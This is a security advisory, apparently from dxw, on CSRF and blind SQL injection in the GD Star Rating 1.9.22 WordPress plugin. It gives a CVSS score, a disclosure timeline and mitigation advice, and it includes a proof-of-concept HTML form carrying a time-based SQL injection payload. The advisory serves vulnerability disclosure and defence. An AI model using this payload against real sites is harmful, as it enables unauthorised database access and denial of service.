CSRF and blind SQL injection in GD Star Rating 1.9.22

Vulnerability

Last revised: February 18, 2014

This plugin is vulnerable to SQL injection. Carrying out an SQL injection requires access to an administrator account. However, the form contains no CSRF protection so an attacker may not need direct access to an account to perform denial of service or to compromise sensitive data.

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability
Score	8.5 High
Vector	Network
Complexity	Low
Authentication	Single
Confidentiality	Complete
Integrity	None
Availability	Complete

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Proof of concept (see code/adm/db.php at line 154):

<form action="http://localhost/wp-admin/admin.php?page=gd-star-rating-stats" method="POST">
  <input type="text" name="s" value="' and sleep(5) = '">
  <input type="text" name="gdsr_search" value="Search Posts">
  <input type="submit">
</form>

Advisory timeline

2013-07-25: Identified
2014-02-18: Reported to plugins@wordpress.org
2014-03-28: No response received. Published.
2014-03-31: Amended to remove confusing reference to XSS

Mitigation/further actions

Disable the plugin until a fix is released.

dxw advisories

Advisory: